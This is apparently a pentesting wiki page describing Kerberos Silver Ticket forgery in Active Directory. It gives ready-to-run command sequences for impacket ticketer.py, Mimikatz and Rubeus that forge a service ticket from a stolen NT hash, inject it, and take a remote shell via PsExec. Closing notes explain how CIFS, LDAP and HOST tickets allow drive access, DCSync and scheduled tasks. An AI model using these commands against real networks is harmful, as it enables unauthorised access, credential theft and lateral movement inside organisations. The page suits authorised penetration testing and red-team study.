# Silver Tickets

A Silver Ticket is a custom Service Ticket that allows any domain user to gain access to any service on a specific computer.

An attacker can create a Service Ticket using any arbitrary domain account, a target SPN, and a forged Privilege Attribute Certificate (PAC) that states that the arbitrary domain user has full access to the service.

{% hint style="info" %}
The password for the target service computer account is required to create a Silver Ticket since the Privilege Attribute Certificate and Service Ticket are both encrypted using the service account's password.
{% endhint %}

## Exploit

{% tabs %}
{% tab title="impacket-ticketer" %}
{% embed url="<https://github.com/fortra/impacket>" %}

{% code title="Linux (Attacker)" %}

```fish
## Create A Silver Ticket Using the NT Hash of the Target Account and Target SPN
ticketer.py -nthash [nt hash] -domain-sid [domain sid] -domain [domain] -spn cifs/computer.weelee.zip weelee

## Set Obtained .ccache to Kerberos Credential Cache
export KRB5CCNAME=[path to .ccache]

## Use Your Exec Tool of Choice to Access Your Specific Service
psexec.py [domain]/[username]@[computer] -k -no-pass
```

{% endcode %}
{% endtab %}

{% tab title="Mimikatz" %}
{% embed url="<https://github.com/gentilkiwi/mimikatz>" %}

{% code title="Windows (Target)" %}

```powershell
## Run Mimikatz.exe
Mimikatz.exe

## Create Silver Ticket And Inject The Ticket Into The Current Process
kerberos::golden /domain:weelee.zip /sid:[domain sid] /rc4:[nt hash] /service:cifs /target:computer.weelee.zip /user:weelee /ptt

## Use Your Exec Tool Of Choice To Access Your Specific Service
PSexec.exe -accepteula \\computer.weelee.zip cmd
```

{% endcode %}

{% hint style="info" %}
The `/rc4` flag can be replaced with `/aes128` or `/aes256` if the provided password is in a different encryption format.
{% endhint %}
{% endtab %}

{% tab title="Rubeus" %}
{% embed url="<https://github.com/GhostPack/Rubeus>" %}

{% embed url="<https://github.com/S3cur3Th1sSh1t/SharpImpersonation>" %}

{% hint style="info" %}
If you want to create a Silver Ticket with access to more than one service, you can add the `/altservice:` flag in your Rubeus command with any additional services.

\ <mark style="color:red;">**`Example`**</mark>`/altservice:cifs,ldap,host,krbtgt,winrm`
{% endhint %}

{% code title="Windows (Target)" %}

```powershell
## Create A Silver Ticket And Inject It Into The Current Process
Rubeus.exe silver /service:cifs/computer.weelee.zip /rc4:[nt hash] /user:weelee /domain:weelee.zip /sid:[domain sid] /nowrap /ptt

## Use Your Exec Tool Of Choice To Access Your Specific Service
PSexec.exe -accepteula \\computer.weelee.zip cmd

OR

## Create A Silver Ticket
Rubeus.exe silver /service:cifs/dc.weelee.zip /rc4:[nt hash] /user:weelee /domain:weelee.zip /sid:[domain sid] /nowrap

## Create A New Process And Inject The Silver Ticket Into It (User/Pass Can Be Anything)
Rubeus.exe createnetonly /program:C:\Windows\System32.cmd.exe /domain:weelee.zip /username:weelee /password:anypassword /ticket:[previous command output]

## Use A Tool To Impersonate The Process Created Above
Invoke-SharpImpersonation -Command "pid:[pid]"
```

{% endcode %}

{% hint style="info" %}
The `/rc4` flag can be replaced with `/aes128` or `/aes256` if the provided password is in a different encryption format.
{% endhint %}
{% endtab %}
{% endtabs %}

{% hint style="info" %} <mark style="color:yellow;">**CIFS**</mark> Allows you to access the *C Drive* and *Admin Drive* via SMB

<mark style="color:yellow;">**LDAP**</mark> Allows you to [DCSync](https://stuff.weelee.zip/network/on-prem-active-directory/credential-hunting/ntds.dit/dcsync)

<mark style="color:yellow;">**HOST**</mark> Allows you to create scheduled tasks on the computer
{% endhint %}